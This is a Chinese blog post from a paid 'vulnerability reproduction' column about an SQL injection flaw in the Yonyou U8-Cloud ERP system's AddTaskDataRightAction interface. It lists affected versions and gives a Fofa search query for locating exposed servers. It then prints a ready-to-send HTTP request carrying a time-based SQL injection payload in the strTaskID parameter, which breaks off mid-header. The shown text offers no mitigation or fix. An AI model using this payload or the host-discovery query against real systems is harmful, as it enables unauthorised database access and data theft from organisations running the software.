用友U8-Cloud AddTaskDataRightAction SQL注入

iSee857

于 2024-09-07 20:16:27 发布

阅读量608

点赞数 19

分类专栏：漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/xc_214/article/details/142001704

版权

漏洞复现专栏收录该内容

202 篇文章 4 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 漏洞描述：

用友U8-Cloud系统AddTaskDataRightAction接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性，甚至获取对数据库的完全控制。

0x02 影响版本：

1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp,5.1

0x03 搜索语句：

Fofa:title=="U8C"

0x04 漏洞复现：

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.task.AddTaskDataRightAction&method=execute&strTaskID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win6

了解本专栏

超级会员免费看